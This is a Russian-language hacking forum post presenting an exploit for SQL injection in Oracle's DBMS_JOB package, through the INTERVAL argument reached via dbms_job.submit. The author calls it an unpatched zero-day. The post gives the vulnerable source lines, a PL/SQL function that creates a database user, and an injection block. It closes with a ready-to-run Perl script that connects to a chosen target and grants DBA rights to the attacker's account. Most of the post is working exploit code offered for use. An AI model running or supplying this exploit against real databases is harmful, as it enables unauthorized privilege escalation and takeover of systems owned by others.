Форум АНТИЧАТ - TARGET: ORACLE: DBMS_JOB PACKAGE, find

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - TARGET: ORACLE: DBMS_JOB PACKAGE, find_date FUNCTION sql-injection (https://forum.antichat.xyz/showthread.php?t=194766)

TARGET: ORACLE: DBMS_JOB PACKAGE, find_date FUNCTION sql-injection

Делать было нечего дело было вечером :)
Не люблю много писать так что по порядку, искал функцию уязвимую к sql-injection под свои нужды, наткнулся на таковую в пакете dbms_job который принадлежит sys пользователю, функция find_date

Код:

...

   30    CUR := DBMS_SQL.OPEN_CURSOR;

   31       BEGIN

   32         

   33         DBMS_SYS_SQL.PARSE_AS_USER( CUR, 'select sysdate, ' || INTERVAL ||

   34                                     ' from dual', DBMS_SQL.NATIVE );

...

Уязвим параметр INTERVAL, но тут проблема функция не обьявлена в пакете то есть иё можно использовать только внутри пакета, под мои нужды это не подходит мб кому-то и подойдет :). Но чтоб довести дело до победного конца нашел процедуру в пакете которая эту функцию использует, она там не одна но так как мне эта функция не подошла я взял первую попавшуюся :)

Код:

...

  134     MYDATE := FIND_DATE(INTERVAL);

  135     IF NOT NO_PARSE THEN

  136       PARSE_JOB(WHAT);

  137     END IF;

  138 

...

1. Создаем функцию, можно использовать и курсор но я предпочитаю старую школу :)

Код:

CREATE OR REPLACE FUNCTION fff return varchar2

authid current_user as

pragma autonomous_transaction;

BEGIN

EXECUTE IMMEDIATE 'create user fff identified by fff';

COMMIT;

RETURN 'sys';

END;

/

2. Ну и собственно сам сплоит

Код:

DECLARE

 jobNo BINARY_INTEGER;

BEGIN

jobNo:=4242;

dbms_job.submit(jobNo, 'do_job;', TRUNC(SYSDATE+(1/24), 'HH'),'TRUNC(SYSDATE+(30/24/60),''MI'') from dual where chr(115)=sys.fff() --');

END;

DB Version: Oracle XE, Oracle 10gR2(возможно и более ранние)
OS: Win XP SP3, Solaris(тестировалось только на этом).

P.S Шедулер у меня выключен при попытки создать задачу на вин процедура выводила ошибку но функция выполнилась :)
Да процедура isubmit так-же уязвима :) тем же способом.
DSU from Ukrainian Security Community

В 9i проверили по моей просьбе, работает :)
Да забыл добавить, патча нет... зеродэй короче :)

Код:

#!/usr/bin/perl

use warnings;

use strict;

use DBI;

use Getopt::Std;

use vars qw/ %opt /;



sub usage {

    print <<"USAGE";

    

Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> [-P <port>]



Options:

     -h     <host>     target server address

     -s     <sid>      target sid name

     -u     <user>     user

     -p     <passwd>   password 



     

    [-P     <port>     Oracle port]



USAGE

    exit 0

}



my $opt_string = 'h:s:u:p:grP:';

getopts($opt_string, \%opt) or &usage;

&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );

&usage if ( !$opt{g} and !$opt{r} );

my $user = uc $opt{u};



my $dbh = undef;

if ($opt{P}) {

    $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;

} else {

    $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;

}



my $sqlcmd = "GRANT DBA TO $user";



print "[-] Creating function...\n";

$dbh->do( qq{

CREATE OR REPLACE FUNCTION fff return varchar2

authid current_user as

pragma autonomous_transaction;

BEGIN

EXECUTE IMMEDIATE '$sqlcmd'; COMMIT;

COMMIT;

RETURN 'sys';

END;

} );

 

print "[-] Go...\n";

my $sth = $dbh->prepare( qq{

DECLARE

 jobNo BINARY_INTEGER;

BEGIN

jobNo:=4242;

dbms_job.submit(jobNo, 'do_job;', TRUNC(SYSDATE+(1/24), 'HH'),'TRUNC(SYSDATE+(30/24/60),''MI'') from dual where chr(115)=sys.fff() --');

END;});

$sth->execute;

$sth->finish;

print "[-] Executed\n";

$dbh->disconnect;

exit;